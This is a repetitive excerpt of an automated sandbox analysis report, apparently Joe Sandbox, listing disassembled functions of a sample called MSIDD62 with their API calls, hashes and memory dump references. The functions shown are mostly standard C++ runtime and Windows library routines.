                                                                      • Opcode ID: 009a2d6cac8c04df60f76784d772327668289a725b676c022f32dad430e67904
                                                                      • Instruction ID: 4ab8399f98a5fb32e2b5ac6ce9b5d18fef834efc0cf7a333f6b1b286bfcbb6e4
                                                                      • Opcode Fuzzy Hash: 009a2d6cac8c04df60f76784d772327668289a725b676c022f32dad430e67904
                                                                      • Instruction Fuzzy Hash: DB01223590022DCBCF02EBA4D8066BEB7A1AF80310F24051DE610AF2D2CF749E01CB84
                                                                      Function 003F7934 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F793B
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7945
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • messages.LIBCPMT ref: 003F797F
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7996
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F79B6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                      • String ID:
                                                                      • API String ID: 2750803064-0
                                                                      • Opcode ID: f5415ab0a0e0c11ec1f2c5d0126e9a596260b9d2ecb14978b14b51226f579987
                                                                      • Instruction ID: 3720ce3e064637d389c24ee127cc000abd09f3461879a371687ed6c0a18e62e0
                                                                      • Opcode Fuzzy Hash: f5415ab0a0e0c11ec1f2c5d0126e9a596260b9d2ecb14978b14b51226f579987
                                                                      • Instruction Fuzzy Hash: 1B01C07590462D8BCF06EB68D906ABFB7A1AF84310F25051DE610BB3D2CF749E028B95
                                                                      Function 003F7C1D Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7C24
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7C2E
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • moneypunct.LIBCPMT ref: 003F7C68
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7C7F
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7C9F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      • Opcode ID: 81cb58268ae0204fe4283342153d1505f826b97950ab19b381d8015793fcc727
                                                                      • Instruction ID: 425c9e57f3aadd39ff8271f0fa5606d146d7ccce9a5cea28ff5c921b7a1d2e61
                                                                      • Opcode Fuzzy Hash: 81cb58268ae0204fe4283342153d1505f826b97950ab19b381d8015793fcc727
                                                                      • Instruction Fuzzy Hash: EC01D23590462D8BCF12EB64D9467BEBBB1AFC4310F25051AE610AF3D2CF389E058B84
                                                                      Function 003F7CB2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7CB9
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7CC3
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • moneypunct.LIBCPMT ref: 003F7CFD
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7D14
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7D34
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      • Opcode ID: 6654f5ff33b2cc1c66cd28e74ca971dbe4c158719ed1ea63134762ae82636d06
                                                                      • Instruction ID: ae7269468eb67fdf95dd2f8aa2151240f01236971af119f2814f670884f5d928
                                                                      • Opcode Fuzzy Hash: 6654f5ff33b2cc1c66cd28e74ca971dbe4c158719ed1ea63134762ae82636d06
                                                                      • Instruction Fuzzy Hash: A801C47590461D9BCF02EB64D9457BEB765AF84310F240529FA116F2D2DF349E0187D4
                                                                      Function 003F7D47 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7D4E
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7D58
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • moneypunct.LIBCPMT ref: 003F7D92
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7DA9
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7DC9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      • Opcode ID: 5436265d0df3e1598deba04aaa18a9a467be8293a798e0e24c96486e83438230
                                                                      • Instruction ID: 5b3777991f0fb3cbc2734d4dbb94a1911644f10972498aaab243d8f47d496f2e
                                                                      • Opcode Fuzzy Hash: 5436265d0df3e1598deba04aaa18a9a467be8293a798e0e24c96486e83438230
                                                                      • Instruction Fuzzy Hash: 7201C07590062D8BCB03EB64C946ABEB7A2AF95310F65011AF610AB3D2DF349E019BC4
                                                                      Function 003F7DDC Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7DE3
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7DED
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • moneypunct.LIBCPMT ref: 003F7E27
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7E3E
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7E5E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      • Opcode ID: 6bba569cf388c4f230e6c179ba25911fbe0372a380a43e598a69767bfcd4e992
                                                                      • Instruction ID: f21794fc6ab50cbc2f48f76b92f58715b99ea45e9f886d864ada5c99cc71a934
                                                                      • Opcode Fuzzy Hash: 6bba569cf388c4f230e6c179ba25911fbe0372a380a43e598a69767bfcd4e992
                                                                      • Instruction Fuzzy Hash: 7E01227190462D9BCF12EB64D8017BEB7A1BF94310F24055AE611AF3D2CF349E01CB84
                                                                      Function 0040782B Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(00444AF8,?,?,003E2627,0044571C,0042CCC0), ref: 00407835
                                                                      • LeaveCriticalSection.KERNEL32(00444AF8,?,?,003E2627,0044571C,0042CCC0), ref: 00407868
                                                                      • RtlWakeAllConditionVariable.NTDLL ref: 004078DF
                                                                      • SetEvent.KERNEL32(?,003E2627,0044571C,0042CCC0), ref: 004078E9
                                                                      • ResetEvent.KERNEL32(?,003E2627,0044571C,0042CCC0), ref: 004078F5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                      • String ID:
                                                                      • API String ID: 3916383385-0
                                                                      • Opcode ID: 9a97a536bf8f0ed328943627a682e613db1dc22bfbf69e451ca5562aa57b806b
                                                                      • Instruction ID: ace09a6154836d104b93435ac20adedb3fd67d0dc8275bad8cbdf05cd55617a6
                                                                      • Opcode Fuzzy Hash: 9a97a536bf8f0ed328943627a682e613db1dc22bfbf69e451ca5562aa57b806b
                                                                      • Instruction Fuzzy Hash: A0016D35A05620DFC714AF18FC09A943B64FB4A702B01407AE80293330CBB56D02DBAC
                                                                      Function 003F3C2E Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 339COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 003F3C35
                                                                        • Part of subcall function 003F2823: __EH_prolog3.LIBCMT ref: 003F282A
                                                                        • Part of subcall function 003F2823: std::_Lockit::_Lockit.LIBCPMT ref: 003F2834
                                                                        • Part of subcall function 003F2823: std::_Lockit::~_Lockit.LIBCPMT ref: 003F28A5
                                                                        • Part of subcall function 003EA2B0: LocalAlloc.KERNEL32(00000040,80000023,00000000,?,?,?,?,003F3F08,00000001,?,00000000,?,?,00000001,?,?), ref: 003EA2F3
                                                                        • Part of subcall function 003EA2B0: LocalFree.KERNEL32(7FFFFFFF,?,?), ref: 003EA399
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: LocalLockitstd::_$AllocFreeH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                      • String ID: 0123456789ABCDEFabcdef-+Xx$=J?$hcK?
                                                                      • API String ID: 1009823702-1633469552
                                                                      • Opcode ID: b9e505ccea7ec69aa13765c49726169fb135fa52751c1661336a8f3aa4dc8cda
                                                                      • Instruction ID: 17d14f7a445cca4e4e74bdd4238c9e0bda5362e2d2b1dc0c60dcfaa832255804
                                                                      • Opcode Fuzzy Hash: b9e505ccea7ec69aa13765c49726169fb135fa52751c1661336a8f3aa4dc8cda
                                                                      • Instruction Fuzzy Hash: 04D18A31E0438C9ADF17DFA8C5806FDBBB2AF55300F294099EA956F296CB709E45CB50
                                                                      Function 003E6090 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 003E60F4
                                                                      • GetLastError.KERNEL32 ref: 003E6190
                                                                        • Part of subcall function 003E1FC0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000000,0042938D,000000FF,?,80070057,?,?,00000000,00000010,003E1B09,?), ref: 003E2040
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000009,0043B2DC,00000001,00000000), ref: 003E614E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryErrorFindLastLibraryLoadResourceSystem
                                                                      • String ID: ntdll.dll
                                                                      • API String ID: 4113295189-2227199552
                                                                      • Opcode ID: 9cd523298d8ab5a5a506a937b5acb5a2eba1745b1c3ab960dd67348a2e8c881b
                                                                      • Instruction ID: 3877937bf283f72f015573526fc53c72ea7e3dd60c3574c54d44be8eff859e96
                                                                      • Opcode Fuzzy Hash: 9cd523298d8ab5a5a506a937b5acb5a2eba1745b1c3ab960dd67348a2e8c881b
                                                                      • Instruction Fuzzy Hash: C031F071A006549BD721DF69CC45BAEB7F8FF58710F108A2EE425D72C1EBB4A904CB94
                                                                      Function 003FD2C2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003FD2C9
                                                                        • Part of subcall function 003F6FF9: _Maklocstr.LIBCPMT ref: 003F7019
                                                                        • Part of subcall function 003F6FF9: _Maklocstr.LIBCPMT ref: 003F7036
                                                                        • Part of subcall function 003F6FF9: _Maklocstr.LIBCPMT ref: 003F7053
                                                                        • Part of subcall function 003F6FF9: _Maklocchr.LIBCPMT ref: 003F7065
                                                                        • Part of subcall function 003F6FF9: _Maklocchr.LIBCPMT ref: 003F7078
                                                                      • _Mpunct.LIBCPMT ref: 003FD356
                                                                      • _Mpunct.LIBCPMT ref: 003FD370
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                      • String ID: $+xv
                                                                      • API String ID: 2939335142-1686923651
                                                                      • Opcode ID: ba964b4ab092324af21b29b1c445b6c09568593dda4532d8621a89e038e8d82e
                                                                      • Instruction ID: e53d973901611999a82b6713142029720565711c3196151217e6a94fb052e47e
                                                                      • Opcode Fuzzy Hash: ba964b4ab092324af21b29b1c445b6c09568593dda4532d8621a89e038e8d82e
                                                                      • Instruction Fuzzy Hash: 4921B2B5904B966FD722DF75849473BBEF8AB09300B044A5EE199C7A42D734E601CB90
                                                                      Function 00404DF4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Mpunct$H_prolog3
                                                                      • String ID: $+xv
                                                                      • API String ID: 4281374311-1686923651
                                                                      • Opcode ID: 968e5194792cd737fa19dbc0bf9eb7784e9daf314f4abe7c877b6bc853c587b9
                                                                      • Instruction ID: 217c18a2671041a185f39ae9d9068373126cdbd2681d4337b0d2d99eef985532
                                                                      • Opcode Fuzzy Hash: 968e5194792cd737fa19dbc0bf9eb7784e9daf314f4abe7c877b6bc853c587b9
                                                                      • Instruction Fuzzy Hash: 8F21A3B1904A966ED721DF75C49073B7EE8AB49300F04492EE559C7A42D738E601CBD4
                                                                      Function 0040C012 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040BFC3,00000000,?,00444EA4,?,?,?,0040C166,00000004,InitializeCriticalSectionEx,0042F92C,InitializeCriticalSectionEx), ref: 0040C01F
                                                                      • GetLastError.KERNEL32(?,0040BFC3,00000000,?,00444EA4,?,?,?,0040C166,00000004,InitializeCriticalSectionEx,0042F92C,InitializeCriticalSectionEx,00000000,?,0040BF1D), ref: 0040C029
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040C051
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID: api-ms-
                                                                      • API String ID: 3177248105-2084034818
                                                                      • Opcode ID: ee13e47115789ce18a88ffa0661c1712838bec352f1c49f3b544d6f0ba214ac6
                                                                      • Instruction ID: 48a6971b1fa9051aaaf7cc350eb90e4c524cead853fe8669ff49303be18f4f3b
                                                                      • Opcode Fuzzy Hash: ee13e47115789ce18a88ffa0661c1712838bec352f1c49f3b544d6f0ba214ac6
                                                                      • Instruction Fuzzy Hash: 07E09A70784208F7EF202BA1EC46B5A3B699B01B55F644032FA0CE85E1D7B5A996D6CC
                                                                      Function 003EE350 Relevance: 6.4, APIs: 4, Instructions: 426COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLocal_strcspn
                                                                      • String ID:
                                                                      • API String ID: 2585785616-0
                                                                      • Opcode ID: c716aad913d32bc06e896f21dee379d18c19bd7d994480a448cb7ebe0f5ec836
                                                                      • Instruction ID: 8a5e0fb3b9b0b18a11d31dac639e835ea2b027f538d407dc9274fcfafe668b37
                                                                      • Opcode Fuzzy Hash: c716aad913d32bc06e896f21dee379d18c19bd7d994480a448cb7ebe0f5ec836
                                                                      • Instruction Fuzzy Hash: A5F17975A00299DFDF15CFA9C884AEEBBF5FF48304F144269E815AB291D731EA41CB90
                                                                      Function 0042738B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetConsoleOutputCP.KERNEL32(755CD0F6,?,00000000,?), ref: 004273EE
                                                                        • Part of subcall function 0042002B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0041C527,?,00000000,-00000008), ref: 004200D7
                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00427649
                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00427691
                                                                      • GetLastError.KERNEL32 ref: 00427734
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                      • String ID:
                                                                      • API String ID: 2112829910-0
                                                                      • Opcode ID: e862e4df0c57509bfea2ce18d490f08c34c0c5b4cf55a189d7656870ba15f5d2
                                                                      • Instruction ID: dba99a240e0573707dd40e57b04429e8a8d3d3e52e0cf91264bf21a56f19f919
                                                                      • Opcode Fuzzy Hash: e862e4df0c57509bfea2ce18d490f08c34c0c5b4cf55a189d7656870ba15f5d2
                                                                      • Instruction Fuzzy Hash: BED189B5E046589FCF01CFA8E8809AEFBB4FF49314F58412AE855E7351D734A842CB58
                                                                      Function 003F8872 Relevance: 6.3, APIs: 4, Instructions: 313COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: _strcspn$H_prolog3_ctype
                                                                      • String ID:
                                                                      • API String ID: 838279627-0
                                                                      • Opcode ID: 3e0969e25d7f161e5926dc9b4b6f31079b69bfedf404d7e31f53c1ec4cb4e257
                                                                      • Instruction ID: d50fef7b2d29abfcb501de0699da7cc5b3d7c4d791c44556870eb19091ddd41c
                                                                      • Opcode Fuzzy Hash: 3e0969e25d7f161e5926dc9b4b6f31079b69bfedf404d7e31f53c1ec4cb4e257
                                                                      • Instruction Fuzzy Hash: C5C17A7191024D9FDF1ADF94C9849FEBBB9FF48300F15402AEA05AB251DB34AE45CBA1
                                                                      Function 003F2A16 Relevance: 6.3, APIs: 4, Instructions: 310COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: _strcspn$H_prolog3_ctype
                                                                      • String ID:
                                                                      • API String ID: 838279627-0
                                                                      • Opcode ID: 08a8aa20114192f4c59bcbf0cb303d723656a1b8effd7fb79d6ec0d1d0ab15de
                                                                      • Instruction ID: 533dca0e35361cbfeea3bb8865cdb71f0433468182ba3be4ffad4abe51068922
                                                                      • Opcode Fuzzy Hash: 08a8aa20114192f4c59bcbf0cb303d723656a1b8effd7fb79d6ec0d1d0ab15de
                                                                      • Instruction Fuzzy Hash: 74C16A7190024DDFDF16DFA8C980AFEBBB9EF08310F14451AEA15AB251D734AE45CBA1
                                                                      Function 0040AFD5 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
